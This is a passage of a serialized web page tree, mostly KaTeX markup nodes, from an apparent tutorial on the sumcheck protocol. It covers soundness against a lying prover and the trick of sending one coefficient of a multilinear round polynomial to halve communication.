n":116959},{"className":116958,"style":11334},[11333],[],{"type":27,"tag":207,"props":116961,"children":116963},{"className":116962},[11339,11340,11341,11342],[116964],{"type":27,"tag":207,"props":116965,"children":116967},{"className":116966},[11294,28860,11342],[116968],{"type":33,"value":4690},{"type":27,"tag":207,"props":116970,"children":116972},{"className":116971},[29017],[116973],{"type":33,"value":29020},{"type":27,"tag":207,"props":116975,"children":116977},{"className":116976},[11319],[116978],{"type":27,"tag":207,"props":116979,"children":116981},{"className":116980,"style":100347},[11324],[116982],{"type":27,"tag":207,"props":116983,"children":116984},{},[],{"type":27,"tag":207,"props":116986,"children":116988},{"className":116987},[28989],[116989],{"type":33,"value":1343},{"type":27,"tag":207,"props":116991,"children":116993},{"className":116992},[11294],[116994],{"type":33,"value":1660},{"type":27,"tag":207,"props":116996,"children":116998},{"className":116997},[29011],[116999],{"type":33,"value":10416},{"type":27,"tag":207,"props":117001,"children":117003},{"className":117002,"style":11373},[11372],[],{"type":27,"tag":207,"props":117005,"children":117007},{"className":117006},[11378],[117008],{"type":33,"value":2227},{"type":27,"tag":207,"props":117010,"children":117012},{"className":117011,"style":11373},[11372],[],{"type":27,"tag":207,"props":117014,"children":117016},{"className":117015},[11283],[117017,117021,117078,117083,117088],{"type":27,"tag":207,"props":117018,"children":117020},{"className":117019,"style":11393},[11288],[],{"type":27,"tag":207,"props":117022,"children":117024},{"className":117023},[11294],[117025,117030],{"type":27,"tag":207,"props":117026,"children":117028},{"className":117027,"style":100750},[11294,28860],[117029],{"type":33,"value":116502},{"type":27,"tag":207,"props":117031,"children":117033},{"className":117032},[11309],[117034],{"type":27,"tag":207,"props":117035,"children":117037},{"className":117036},[11314,28914],[117038,117067],{"type":27,"tag":207,"props":117039,"children":117041},{"className":117040},[11319],[117042,117062],{"type":27,"tag":207,"props":117043,"children":117045},{"className":117044,"style":100793},[11324],[117046],{"type":27,"tag":207,"props":117047,"children":117048},{"style":100797},[117049,117053],{"type":27,"tag":207,"props":117050,"children":117052},{"className":117051,"style":11334},[11333],[],{"type":27,"tag":207,"props":117054,"children":117056},{"className":117055},[11339,11340,11341,11342],[117057],{"type":27,"tag":207,"props":117058,"children":117060},{"className":117059},[11294,28860,11342],[117061],{"type":33,"value":4690},{"type":27,"tag":207,"props":117063,"children":117065},{"className":117064},[29017],[117066],{"type":33,"value":29020},{"type":27,"tag":207,"props":117068,"children":117070},{"className":117069},[11319],[117071],{"type":27,"tag":207,"props":117072,"children":117074},{"className":117073,"style":100347},[11324],[117075],{"type":27,"tag":207,"props":117076,"children":117077},{},[],{"type":27,"tag":207,"props":117079,"children":117081},{"className":117080},[28989],[117082],{"type":33,"value":1343},{"type":27,"tag":207,"props":117084,"children":117086},{"className":117085},[11294],[117087],{"type":33,"value":1651},{"type":27,"tag":207,"props":117089,"children":117091},{"className":117090},[29011],[117092],{"type":33,"value":10416},{"type":33,"value":117094}," equals the previous claim. If the prover is lying about the original sum ",{"type":27,"tag":84,"props":117096,"children":117098},{"className":117097},[11266,11267],[117099],{"type":27,"tag":207,"props":117100,"children":117102},{"className":117101},[11272],[117103],{"type":27,"tag":207,"props":117104,"children":117106},{"className":117105,"ariaHidden":11278},[11277],[117107],{"type":27,"tag":207,"props":117108,"children":117110},{"className":117109},[11283],[117111,117115],{"type":27,"tag":207,"props":117112,"children":117114},{"className":117113,"style":28855},[11288],[],{"type":27,"tag":207,"props":117116,"children":117118},{"className":117117,"style":100498},[11294,28860],[117119],{"type":33,"value":100501},{"type":33,"value":117121},", then they must lie about ",{"type":27,"tag":84,"props":117123,"children":117125},{"className":117124},[11266,11267],[117126],{"type":27,"tag":207,"props":117127,"children":117129},{"className":117128},[11272],[117130],{"type":27,"tag":207,"props":117131,"children":117133},{"className":117132,"ariaHidden":11278},[11277],[117134],{"type":27,"tag":207,"props":117135,"children":117137},{"className":117136},[11283],[117138,117143],{"type":27,"tag":207,"props":117139,"children":117142},{"className":117140,"style":117141},[11288],"height:0.625em;vertical-align:-0.1944em;",[],{"type":27,"tag":207,"props":117144,"children":117146},{"className":117145},[11294],[117147,117152],{"type":27,"tag":207,"props":117148,"children":117150},{"className":117149,"style":100750},[11294,28860],[117151],{"type":33,"value":116502},{"type":27,"tag":207,"props":117153,"children":117155},{"className":117154},[11309],[117156],{"type":27,"tag":207,"props":117157,"children":117159},{"className":117158},[11314,28914],[117160,117189],{"type":27,"tag":207,"props":117161,"children":117163},{"className":117162},[11319],[117164,117184],{"type":27,"tag":207,"props":117165,"children":117167},{"className":117166,"style":100793},[11324],[117168],{"type":27,"tag":207,"props":117169,"children":117170},{"style":100797},[117171,117175],{"type":27,"tag":207,"props":117172,"children":117174},{"className":117173,"style":11334},[11333],[],{"type":27,"tag":207,"props":117176,"children":117178},{"className":117177},[11339,11340,11341,11342],[117179],{"type":27,"tag":207,"props":117180,"children":117182},{"className":117181},[11294,28860,11342],[117183],{"type":33,"value":4690},{"type":27,"tag":207,"props":117185,"children":117187},{"className":117186},[29017],[117188],{"type":33,"value":29020},{"type":27,"tag":207,"props":117190,"children":117192},{"className":117191},[11319],[117193],{"type":27,"tag":207,"props":117194,"children":117196},{"className":117195,"style":100347},[11324],[117197],{"type":27,"tag":207,"props":117198,"children":117199},{},[],{"type":33,"value":117201}," somewhere. But since the verifier picks a random ",{"type":27,"tag":84,"props":117203,"children":117205},{"className":117204},[11266,11267],[117206],{"type":27,"tag":207,"props":117207,"children":117209},{"className":117208},[11272],[117210],{"type":27,"tag":207,"props":117211,"children":117213},{"className":117212,"ariaHidden":11278},[11277],[117214],{"type":27,"tag":207,"props":117215,"children":117217},{"className":117216},[11283],[117218,117223],{"type":27,"tag":207,"props":117219,"children":117222},{"className":117220,"style":117221},[11288],"height:0.5806em;vertical-align:-0.15em;",[],{"type":27,"tag":207,"props":117224,"children":117226},{"className":117225},[11294],[117227,117232],{"type":27,"tag":207,"props":117228,"children":117230},{"className":117229,"style":100264},[11294,28860],[117231],{"type":33,"value":101083},{"type":27,"tag":207,"props":117233,"children":117235},{"className":117234},[11309],[117236],{"type":27,"tag":207,"props":117237,"children":117239},{"className":117238},[11314,28914],[117240,117270],{"type":27,"tag":207,"props":117241,"children":117243},{"className":117242},[11319],[117244,117265],{"type":27,"tag":207,"props":117245,"children":117247},{"className":117246,"style":100793},[11324],[117248],{"type":27,"tag":207,"props":117249,"children":117251},{"style":117250},"top:-2.55em;margin-left:-0.0278em;margin-right:0.05em;",[117252,117256],{"type":27,"tag":207,"props":117253,"children":117255},{"className":117254,"style":11334},[11333],[],{"type":27,"tag":207,"props":117257,"children":117259},{"className":117258},[11339,11340,11341,11342],[117260],{"type":27,"tag":207,"props":117261,"children":117263},{"className":117262},[11294,28860,11342],[117264],{"type":33,"value":4690},{"type":27,"tag":207,"props":117266,"children":117268},{"className":117267},[29017],[117269],{"type":33,"value":29020},{"type":27,"tag":207,"props":117271,"children":117273},{"className":117272},[11319],[117274],{"type":27,"tag":207,"props":117275,"children":117277},{"className":117276,"style":100347},[11324],[117278],{"type":27,"tag":207,"props":117279,"children":117280},{},[],{"type":33,"value":117282},", with overwhelming probability, the prover won't then be able to match the evaluation of the original polynomial.",{"type":27,"tag":26163,"props":117284,"children":117286},{"id":117285},"the-compression-trick",[117287],{"type":33,"value":117288},"The Compression Trick",{"type":27,"tag":36,"props":117290,"children":117291},{},[117292,117294,117444,117446,117726],{"type":33,"value":117293},"For degree-1 (multilinear) polynomials, ",{"type":27,"tag":84,"props":117295,"children":117297},{"className":117296},[11266,11267],[117298],{"type":27,"tag":207,"props":117299,"children":117301},{"className":117300},[11272],[117302],{"type":27,"tag":207,"props":117303,"children":117305},{"className":117304,"ariaHidden":11278},[11277],[117306,117399,117426],{"type":27,"tag":207,"props":117307,"children":117309},{"className":117308},[11283],[117310,117314,117371,117376,117381,117386,117390,117395],{"type":27,"tag":207,"props":117311,"children":117313},{"className":117312,"style":11393},[11288],[],{"type":27,"tag":207,"props":117315,"children":117317},{"className":117316},[11294],[117318,117323],{"type":27,"tag":207,"props":117319,"children":117321},{"className":117320,"style":100750},[11294,28860],[117322],{"type":33,"value":116502},{"type":27,"tag":207,"props":117324,"children":117326},{"className":117325},[11309],[117327],{"type":27,"tag":207,"props":117328,"children":117330},{"className":117329},[11314,28914],[117331,117360],{"type":27,"tag":207,"props":117332,"children":117334},{"className":117333},[11319],[117335,117355],{"type":27,"tag":207,"props":117336,"children":117338},{"className":117337,"style":100793},[11324],[117339],{"type":27,"tag":207,"props":117340,"children":117341},{"style":100797},[117342,117346],{"type":27,"tag":207,"props":117343,"children":117345},{"className":117344,"style":11334},[11333],[],{"type":27,"tag":207,"props":117347,"children":117349},{"className":117348},[11339,11340,11341,11342],[117350],{"type":27,"tag":207,"props":117351,"children":117353},{"className":117352},[11294,28860,11342],[117354],{"type":33,"value":4690},{"type":27,"tag":207,"props":117356,"children":117358},{"className":117357},[29017],[117359],{"type":33,"value":29020},{"type":27,"tag":207,"props":117361,"children":117363},{"className":117362},[11319],[117364],{"type":27,"tag":207,"props":117365,"children":117367},{"className":117366,"style":100347},[11324],[117368],{"type":27,"tag":207,"props":117369,"children":117370},{},[],{"type":27,"tag":207,"props":117372,"children":117374},{"className":117373},[28989],[117375],{"type":33,"value":1343},{"type":27,"tag":207,"props":117377,"children":117379},{"className":117378,"style":102284},[11294,28860],[117380],{"type":33,"value":13415},{"type":27,"tag":207,"props":117382,"children":117384},{"className":117383},[29011],[117385],{"type":33,"value":10416},{"type":27,"tag":207,"props":117387,"children":117389},{"className":117388,"style":11470},[11372],[],{"type":27,"tag":207,"props":117391,"children":117393},{"className":117392},[11475],[117394],{"type":33,"value":10380},{"type":27,"tag":207,"props":117396,"children":117398},{"className":117397,"style":11470},[11372],[],{"type":27,"tag":207,"props":117400,"children":117402},{"className":117401},[11283],[117403,117408,117413,117417,117422],{"type":27,"tag":207,"props":117404,"children":117407},{"className":117405,"style":117406},[11288],"height:0.6667em;vertical-align:-0.0833em;",[],{"type":27,"tag":207,"props":117409,"children":117411},{"className":117410},[11294,28860],[117412],{"type":33,"value":47},{"type":27,"tag":207,"props":117414,"children":117416},{"className":117415,"style":11373},[11372],[],{"type":27,"tag":207,"props":117418,"children":117420},{"className":117419},[11378],[117421],{"type":33,"value":2227},{"type":27,"tag":207,"props":117423,"children":117425},{"className":117424,"style":11373},[11372],[],{"type":27,"tag":207,"props":117427,"children":117429},{"className":117428},[11283],[117430,117434,117439],{"type":27,"tag":207,"props":117431,"children":117433},{"className":117432,"style":100179},[11288],[],{"type":27,"tag":207,"props":117435,"children":117437},{"className":117436},[11294,28860],[117438],{"type":33,"value":10512},{"type":27,"tag":207,"props":117440,"children":117442},{"className":117441,"style":102284},[11294,28860],[117443],{"type":33,"value":13415},{"type":33,"value":117445}," has only two coefficients. Since the verifier knows ",{"type":27,"tag":84,"props":117447,"children":117449},{"className":117448},[11266,11267],[117450],{"type":27,"tag":207,"props":117451,"children":117453},{"className":117452},[11272],[117454],{"type":27,"tag":207,"props":117455,"children":117457},{"className":117456,"ariaHidden":11278},[11277],[117458,117551,117644],{"type":27,"tag":207,"props":117459,"children":117461},{"className":117460},[11283],[117462,117466,117523,117528,117533,117538,117542,117547],{"type":27,"tag":207,"props":117463,"children":117465},{"className":117464,"style":11393},[11288],[],{"type":27,"tag":207,"props":117467,"children":117469},{"className":117468},[11294],[117470,117475],{"type":27,"tag":207,"props":117471,"children":117473},{"className":117472,"style":100750},[11294,28860],[117474],{"type":33,"value":116502},{"type":27,"tag":207,"props":117476,"children":117478},{"className":117477},[11309],[117479],{"type":27,"tag":207,"props":117480,"children":117482},{"className":117481},[11314,28914],[117483,117512],{"type":27,"tag":207,"props":117484,"children":117486},{"className":117485},[11319],[117487,117507],{"type":27,"tag":207,"props":117488,"children":117490},{"className":117489,"style":100793},[11324],[117491],{"type":27,"tag":207,"props":117492,"children":117493},{"style":100797},[117494,117498],{"type":27,"tag":207,"props":117495,"children":117497},{"className":117496,"style":11334},[11333],[],{"type":27,"tag":207,"props":117499,"children":117501},{"className":117500},[11339,11340,11341,11342],[117502],{"type":27,"tag":207,"props":117503,"children":117505},{"className":117504},[11294,28860,11342],[117506],{"type":33,"value":4690},{"type":27,"tag":207,"props":117508,"children":117510},{"className":117509},[29017],[117511],{"type":33,"value":29020},{"type":27,"tag":207,"props":117513,"children":117515},{"className":117514},[11319],[117516],{"type":27,"tag":207,"props":117517,"children":117519},{"className":117518,"style":100347},[11324],[117520],{"type":27,"tag":207,"props":117521,"children":117522},{},[],{"type":27,"tag":207,"props":117524,"children":117526},{"className":117525},[28989],[117527],{"type":33,"value":1343},{"type":27,"tag":207,"props":117529,"children":117531},{"className":117530},[11294],[117532],{"type":33,"value":1660},{"type":27,"tag":207,"props":117534,"children":117536},{"className":117535},[29011],[117537],{"type":33,"value":10416},{"type":27,"tag":207,"props":117539,"children":117541},{"className":117540,"style":11373},[11372],[],{"type":27,"tag":207,"props":117543,"children":117545},{"className":117544},[11378],[117546],{"type":33,"value":2227},{"type":27,"tag":207,"props":117548,"children":117550},{"className":117549,"style":11373},[11372],[],{"type":27,"tag":207,"props":117552,"children":117554},{"className":117553},[11283],[117555,117559,117616,117621,117626,117631,117635,117640],{"type":27,"tag":207,"props":117556,"children":117558},{"className":117557,"style":11393},[11288],[],{"type":27,"tag":207,"props":117560,"children":117562},{"className":117561},[11294],[117563,117568],{"type":27,"tag":207,"props":117564,"children":117566},{"className":117565,"style":100750},[11294,28860],[117567],{"type":33,"value":116502},{"type":27,"tag":207,"props":117569,"children":117571},{"className":117570},[11309],[117572],{"type":27,"tag":207,"props":117573,"children":117575},{"className":117574},[11314,28914],[117576,117605],{"type":27,"tag":207,"props":117577,"children":117579},{"className":117578},[11319],[117580,117600],{"type":27,"tag":207,"props":117581,"children":117583},{"className":117582,"style":100793},[11324],[117584],{"type":27,"tag":207,"props":117585,"children":117586},{"style":100797},[117587,117591],{"type":27,"tag":207,"props":117588,"children":117590},{"className":117589,"style":11334},[11333],[],{"type":27,"tag":207,"props":117592,"children":117594},{"className":117593},[11339,11340,11341,11342],[117595],{"type":27,"tag":207,"props":117596,"children":117598},{"className":117597},[11294,28860,11342],[117599],{"type":33,"value":4690},{"type":27,"tag":207,"props":117601,"children":117603},{"className":117602},[29017],[117604],{"type":33,"value":29020},{"type":27,"tag":207,"props":117606,"children":117608},{"className":117607},[11319],[117609],{"type":27,"tag":207,"props":117610,"children":117612},{"className":117611,"style":100347},[11324],[117613],{"type":27,"tag":207,"props":117614,"children":117615},{},[],{"type":27,"tag":207,"props":117617,"children":117619},{"className":117618},[28989],[117620],{"type":33,"value":1343},{"type":27,"tag":207,"props":117622,"children":117624},{"className":117623},[11294],[117625],{"type":33,"value":1651},{"type":27,"tag":207,"props":117627,"children":117629},{"className":117628},[29011],[117630],{"type":33,"value":10416},{"type":27,"tag":207,"props":117632,"children":117634},{"className":117633,"style":11470},[11372],[],{"type":27,"tag":207,"props":117636,"children":117638},{"className":117637},[11475],[117639],{"type":33,"value":10380},{"type":27,"tag":207,"props":117641,"children":117643},{"className":117642,"style":11470},[11372],[],{"type":27,"tag":207,"props":117645,"children":117647},{"className":117646},[11283],[117648,117653],{"type":27,"tag":207,"props":117649,"children":117652},{"className":117650,"style":117651},[11288],"height:0.8917em;vertical-align:-0.2083em;",[],{"type":27,"tag":207,"props":117654,"children":117656},{"className":117655},[11294],[117657,117662],{"type":27,"tag":207,"props":117658,"children":117660},{"className":117659,"style":100498},[11294,28860],[117661],{"type":33,"value":100501},{"type":27,"tag":207,"props":117663,"children":117665},{"className":117664},[11309],[117666],{"type":27,"tag":207,"props":117667,"children":117669},{"className":117668},[11314,28914],[117670,117714],{"type":27,"tag":207,"props":117671,"children":117673},{"className":117672},[11319],[117674,117709],{"type":27,"tag":207,"props":117675,"children":117677},{"className":117676,"style":100793},[11324],[117678],{"type":27,"tag":207,"props":117679,"children":117681},{"style":117680},"top:-2.55em;margin-left:-0.0813em;margin-right:0.05em;",[117682,117686],{"type":27,"tag":207,"props":117683,"children":117685},{"className":117684,"style":11334},[11333],[],{"type":27,"tag":207,"props":117687,"children":117689},{"className":117688},[11339,11340,11341,11342],[117690],{"type":27,"tag":207,"props":117691,"children":117693},{"className":117692},[11294,11342],[117694,117699,117704],{"type":27,"tag":207,"props":117695,"children":117697},{"className":117696},[11294,28860,11342],[117698],{"type":33,"value":4690},{"type":27,"tag":207,"props":117700,"children":117702},{"className":117701},[11378,11342],[117703],{"type":33,"value":11353},{"type":27,"tag":207,"props":117705,"children":117707},{"className":117706},[11294,11342],[117708],{"type":33,"value":1651},{"type":27,"tag":207,"props":117710,"children":117712},{"className":117711},[29017],[117713],{"type":33,"value":29020},{"type":27,"tag":207,"props":117715,"children":117717},{"className":117716},[11319],[117718],{"type":27,"tag":207,"props":117719,"children":117722},{"className":117720,"style":117721},[11324],"height:0.2083em;",[117723],{"type":27,"tag":207,"props":117724,"children":117725},{},[],{"type":33,"value":117727}," (the previous claim), we have:",{"type":27,"tag":36,"props":117729,"children":117730},{},[117731],{"type":27,"tag":84,"props":117732,"children":117734},{"className":117733},[11266,11267],[117735],{"type":27,"tag":207,"props":117736,"children":117738},{"className":117737},[11272],[117739],{"type":27,"tag":207,"props":117740,"children":117742},{"className":117741,"ariaHidden":11278},[11277],[117743,117769,117800,117831,117932,117958,118050],{"type":27,"tag":207,"props":117744,"children":117746},{"className":117745},[11283],[117747,117751,117756,117760,117765],{"type":27,"tag":207,"props":117748,"children":117750},{"className":117749,"style":117406},[11288],[],{"type":27,"tag":207,"props":117752,"children":117754},{"className":117753},[11294,28860],[117755],{"type":33,"value":47},{"type":27,"tag":207,"props":117757,"children":117759},{"className":117758,"style":11373},[11372],[],{"type":27,"tag":207,"props":117761,"children":117763},{"className":117762},[11378],[117764],{"type":33,"value":2227},{"type":27,"tag":207,"props":117766,"children":117768},{"className":117767,"style":11373},[11372],[],{"type":27,"tag":207,"props":117770,"children":117772},{"className":117771},[11283],[117773,117777,117782,117787,117791,117796],{"type":27,"tag":207,"props":117774,"children":117776},{"className":117775,"style":11393},[11288],[],{"type":27,"tag":207,"props":117778,"children":117780},{"className":117779},[28989],[117781],{"type":33,"value":1343},{"type":27,"tag":207,"props":117783,"children":117785},{"className":117784},[11294,28860],[117786],{"type":33,"value":47},{"type":27,"tag":207,"props":117788,"children":117790},{"className":117789,"style":11373},[11372],[],{"type":27,"tag":207,"props":117792,"children":117794},{"className":117793},[11378],[117795],{"type":33,"value":2227},{"type":27,"tag":207,"props":117797,"children":117799},{"className":117798,"style":11373},[11372],[],{"type":27,"tag":207,"props":117801,"children":117803},{"className":117802},[11283],[117804,117808,117813,117818,117822,117827],{"type":27,"tag":207,"props":117805,"children":117807},{"className":117806,"style":11393},[11288],[],{"type":27,"tag":207,"props":117809,"children":117811},{"className":117810},[11294,28860],[117812],{"type":33,"value":10512},{"type":27,"tag":207,"props":117814,"children":117816},{"className":117815},[29011],[117817],{"type":33,"value":10416},{"type":27,"tag":207,"props":117819,"children":117821},{"className":117820,"style":11470},[11372],[],{"type":27,"tag":207,"props":117823,"children":117825},{"className":117824},[11475],[117826],{"type":33,"value":10380},{"type":27,"tag":207,"props":117828,"children":117830},{"className":117829,"style":11470},[11372],[],{"type":27,"tag":207,"props":117832,"children":117834},{"className":117833},[11283],[117835,117839,117910,117914,117918,117924,117928],{"type":27,"tag":207,"props":117836,"children":117838},{"className":117837,"style":117651},[11288],[],{"type":27,"tag":207,"props":117840,"children":117842},{"className":117841},[11294],[117843,117848],{"type":27,"tag":207,"props":117844,"children":117846},{"className":117845,"style":100498},[11294,28860],[117847],{"type":33,"value":100501},{"type":27,"tag":207,"props":117849,"children":117851},{"className":117850},[11309],[117852],{"type":27,"tag":207,"props":117853,"children":117855},{"className":117854},[11314,28914],[117856,117899],{"type":27,"tag":207,"props":117857,"children":117859},{"className":117858},[11319],[117860,117894],{"type":27,"tag":207,"props":117861,"children":117863},{"className":117862,"style":100793},[11324],[117864],{"type":27,"tag":207,"props":117865,"children":117866},{"style":117680},[117867,117871],{"type":27,"tag":207,"props":117868,"children":117870},{"className":117869,"style":11334},[11333],[],{"type":27,"tag":207,"props":117872,"children":117874},{"className":117873},[11339,11340,11341,11342],[117875],{"type":27,"tag":207,"props":117876,"children":117878},{"className":117877},[11294,11342],[117879,117884,117889],{"type":27,"tag":207,"props":117880,"children":117882},{"className":117881},[11294,28860,11342],[117883],{"type":33,"value":4690},{"type":27,"tag":207,"props":117885,"children":117887},{"className":117886},[11378,11342],[117888],{"type":33,"value":11353},{"type":27,"tag":207,"props":117890,"children":117892},{"className":117891},[11294,11342],[117893],{"type":33,"value":1651},{"type":27,"tag":207,"props":117895,"children":117897},{"className":117896},[29017],[117898],{"type":33,"value":29020},{"type":27,"tag":207,"props":117900,"children":117902},{"className":117901},[11319],[117903],{"type":27,"tag":207,"props":117904,"children":117906},{"className":117905,"style":117721},[11324],[117907],{"type":27,"tag":207,"props":117908,"children":117909},{},[],{"type":27,"tag":207,"props":117911,"children":117913},{"className":117912,"style":11470},[11372],[],{"type":27,"tag":207,"props":117915,"children":117917},{"className":117916,"style":11470},[11372],[],{"type":27,"tag":207,"props":117919,"children":117921},{"className":117920},[11475],[117922],{"type":33,"value":117923},"⟹",{"type":27,"tag":207,"props":117925,"children":117927},{"className":117926,"style":11470},[11372],[],{"type":27,"tag":207,"props":117929,"children":117931},{"className":117930,"style":11470},[11372],[],{"type":27,"tag":207,"props":117933,"children":117935},{"className":117934},[11283],[117936,117940,117945,117949,117954],{"type":27,"tag":207,"props":117937,"children":117939},{"className":117938,"style":100179},[11288],[],{"type":27,"tag":207,"props":117941,"children":117943},{"className":117942},[11294,28860],[117944],{"type":33,"value":10512},{"type":27,"tag":207,"props":117946,"children":117948},{"className":117947,"style":11470},[11372],[],{"type":27,"tag":207,"props":117950,"children":117952},{"className":117951},[11475],[117953],{"type":33,"value":10380},{"type":27,"tag":207,"props":117955,"children":117957},{"className":117956,"style":11470},[11372],[],{"type":27,"tag":207,"props":117959,"children":117961},{"className":117960},[11283],[117962,117966,118037,118041,118046],{"type":27,"tag":207,"props":117963,"children":117965},{"className":117964,"style":117651},[11288],[],{"type":27,"tag":207,"props":117967,"children":117969},{"className":117968},[11294],[117970,117975],{"type":27,"tag":207,"props":117971,"children":117973},{"className":117972,"style":100498},[11294,28860],[117974],{"type":33,"value":100501},{"type":27,"tag":207,"props":117976,"children":117978},{"className":117977},[11309],[117979],{"type":27,"tag":207,"props":117980,"children":117982},{"className":117981},[11314,28914],[117983,118026],{"type":27,"tag":207,"props":117984,"children":117986},{"className":117985},[11319],[117987,118021],{"type":27,"tag":207,"props":117988,"children":117990},{"className":117989,"style":100793},[11324],[117991],{"type":27,"tag":207,"props":117992,"children":117993},{"style":117680},[117994,117998],{"type":27,"tag":207,"props":117995,"children":117997},{"className":117996,"style":11334},[11333],[],{"type":27,"tag":207,"props":117999,"children":118001},{"className":118000},[11339,11340,11341,11342],[118002],{"type":27,"tag":207,"props":118003,"children":118005},{"className":118004},[11294,11342],[118006,118011,118016],{"type":27,"tag":207,"props":118007,"children":118009},{"className":118008},[11294,28860,11342],[118010],{"type":33,"value":4690},{"type":27,"tag":207,"props":118012,"children":118014},{"className":118013},[11378,11342],[118015],{"type":33,"value":11353},{"type":27,"tag":207,"props":118017,"children":118019},{"className":118018},[11294,11342],[118020],{"type":33,"value":1651},{"type":27,"tag":207,"props":118022,"children":118024},{"className":118023},[29017],[118025],{"type":33,"value":29020},{"type":27,"tag":207,"props":118027,"children":118029},{"className":118028},[11319],[118030],{"type":27,"tag":207,"props":118031,"children":118033},{"className":118032,"style":117721},[11324],[118034],{"type":27,"tag":207,"props":118035,"children":118036},{},[],{"type":27,"tag":207,"props":118038,"children":118040},{"className":118039,"style":11373},[11372],[],{"type":27,"tag":207,"props":118042,"children":118044},{"className":118043},[11378],[118045],{"type":33,"value":11353},{"type":27,"tag":207,"props":118047,"children":118049},{"className":118048,"style":11373},[11372],[],{"type":27,"tag":207,"props":118051,"children":118053},{"className":118052},[11283],[118054,118058,118063],{"type":27,"tag":207,"props":118055,"children":118057},{"className":118056,"style":101295},[11288],[],{"type":27,"tag":207,"props":118059,"children":118061},{"className":118060},[11294],[118062],{"type":33,"value":1744},{"type":27,"tag":207,"props":118064,"children":118066},{"className":118065},[11294,28860],[118067],{"type":33,"value":47},{"type":27,"tag":36,"props":118069,"children":118070},{},[118071,118073,118192,118194,118219],{"type":33,"value":118072},"So the prover only sends ",{"type":27,"tag":84,"props":118074,"children":118076},{"className":118075},[11266,11267],[118077],{"type":27,"tag":207,"props":118078,"children":118080},{"className":118079},[11272],[118081],{"type":27,"tag":207,"props":118082,"children":118084},{"className":118083,"ariaHidden":11278},[11277],[118085,118112],{"type":27,"tag":207,"props":118086,"children":118088},{"className":118087},[11283],[118089,118094,118099,118103,118108],{"type":27,"tag":207,"props":118090,"children":118093},{"className":118091,"style":118092},[11288],"height:0.4306em;",[],{"type":27,"tag":207,"props":118095,"children":118097},{"className":118096},[11294,28860],[118098],{"type":33,"value":47},{"type":27,"tag":207,"props":118100,"children":118102},{"className":118101,"style":11470},[11372],[],{"type":27,"tag":207,"props":118104,"children":118106},{"className":118105},[11475],[118107],{"type":33,"value":10380},{"type":27,"tag":207,"props":118109,"children":118111},{"className":118110,"style":11470},[11372],[],{"type":27,"tag":207,"props":118113,"children":118115},{"className":118114},[11283],[118116,118120,118177,118182,118187],{"type":27,"tag":207,"props":118117,"children":118119},{"className":118118,"style":11393},[11288],[],{"type":27,"tag":207,"props":118121,"children":118123},{"className":118122},[11294],[118124,118129],{"type":27,"tag":207,"props":118125,"children":118127},{"className":118126,"style":100750},[11294,28860],[118128],{"type":33,"value":116502},{"type":27,"tag":207,"props":118130,"children":118132},{"className":118131},[11309],[118133],{"type":27,"tag":207,"props":118134,"children":118136},{"className":118135},[11314,28914],[118137,118166],{"type":27,"tag":207,"props":118138,"children":118140},{"className":118139},[11319],[118141,118161],{"type":27,"tag":207,"props":118142,"children":118144},{"className":118143,"style":100793},[11324],[118145],{"type":27,"tag":207,"props":118146,"children":118147},{"style":100797},[118148,118152],{"type":27,"tag":207,"props":118149,"children":118151},{"className":118150,"style":11334},[11333],[],{"type":27,"tag":207,"props":118153,"children":118155},{"className":118154},[11339,11340,11341,11342],[118156],{"type":27,"tag":207,"props":118157,"children":118159},{"className":118158},[11294,28860,11342],[118160],{"type":33,"value":4690},{"type":27,"tag":207,"props":118162,"children":118164},{"className":118163},[29017],[118165],{"type":33,"value":29020},{"type":27,"tag":207,"props":118167,"children":118169},{"className":118168},[11319],[118170],{"type":27,"tag":207,"props":118171,"children":118173},{"className":118172,"style":100347},[11324],[118174],{"type":27,"tag":207,"props":118175,"children":118176},{},[],{"type":27,"tag":207,"props":118178,"children":118180},{"className":118179},[28989],[118181],{"type":33,"value":1343},{"type":27,"tag":207,"props":118183,"children":118185},{"className":118184},[11294],[118186],{"type":33,"value":1660},{"type":27,"tag":207,"props":118188,"children":118190},{"className":118189},[29011],[118191],{"type":33,"value":10416},{"type":33,"value":118193},", and the verifier recovers ",{"type":27,"tag":84,"props":118195,"children":118197},{"className":118196},[11266,11267],[118198],{"type":27,"tag":207,"props":118199,"children":118201},{"className":118200},[11272],[118202],{"type":27,"tag":207,"props":118203,"children":118205},{"className":118204,"ariaHidden":11278},[11277],[118206],{"type":27,"tag":207,"props":118207,"children":118209},{"className":118208},[11283],[118210,118214],{"type":27,"tag":207,"props":118211,"children":118213},{"className":118212,"style":100179},[11288],[],{"type":27,"tag":207,"props":118215,"children":118217},{"className":118216},[11294,28860],[118218],{"type":33,"value":10512},{"type":33,"value":118220},". This saves 50% on communication costs.",{"type":27,"tag":36,"props":118222,"children":118223},{},[118224],{"type":33,"value":118225},"The next claim in the chain is",{"type":27,"tag":36,"props":118227,"children":118228},{},[118229],{"type":27,"tag":84,"props":118230,"children":118232},{"className":118231},[11266,11267],[118233],{"type":27,"tag":207,"props":118234,"children":118236},{"className":118235},[11272],[118237],{"type":27,"tag":207,"props":118238,"children":118240},{"className":118239,"ariaHidden":11278},[11277],[118241,118320,118465,118491,118518,118596,118622,118719,118755,118833,118869,118957,119049],{"type":27,"tag":207,"props":118242,"children":118244},{"className":118243},[11283],[118245,118250,118307,118311,118316],{"type":27,"tag":207,"props":118246,"children":118249},{"className":118247,"style":118248},[11288],"height:0.8333em;vertical-align:-0.15em;",[],{"type":27,"tag":207,"props":118251,"children":118253},{"className":118252},[11294],[118254,118259],{"type":27,"tag":207,"props":118255,"children":118257},{"className":118256,"style":100498},[11294,28860],[118258],{"type":33,"value":100501},{"type":27,"tag":207,"props":118260,"children":118262},{"className":118261},[11309],[118263],{"type":27,"tag":207,"props":118264,"children":118266},{"className":118265},[11314,28914],[118267,118296],{"type":27,"tag":207,"props":118268,"children":118270},{"className":118269},[11319],[118271,118291],{"type":27,"tag":207,"props":118272,"children":118274},{"className":118273,"style":100793},[11324],[118275],{"type":27,"tag":207,"props":118276,"children":118277},{"style":117680},[118278,118282],{"type":27,"tag":207,"props":118279,"children":118281},{"className":118280,"style":11334},[11333],[],{"type":27,"tag":207,"props":118283,"children":118285},{"className":118284},[11339,11340,11341,11342],[118286],{"type":27,"tag":207,"props":118287,"children":118289},{"className":118288},[11294,28860,11342],[118290],{"type":33,"value":4690},{"type":27,"tag":207,"props":118292,"children":118294},{"className":118293},[29017],[118295],{"type":33,"value":29020},{"type":27,"tag":207,"props":118297,"children":118299},{"className":118298},[11319],[118300],{"type":27,"tag":207,"props":118301,"children":118303},{"className":118302,"style":100347},[11324],[118304],{"type":27,"tag":207,"props":118305,"children":118306},{},[],{"type":27,"tag":207,"props":118308,"children":118310},{"classNa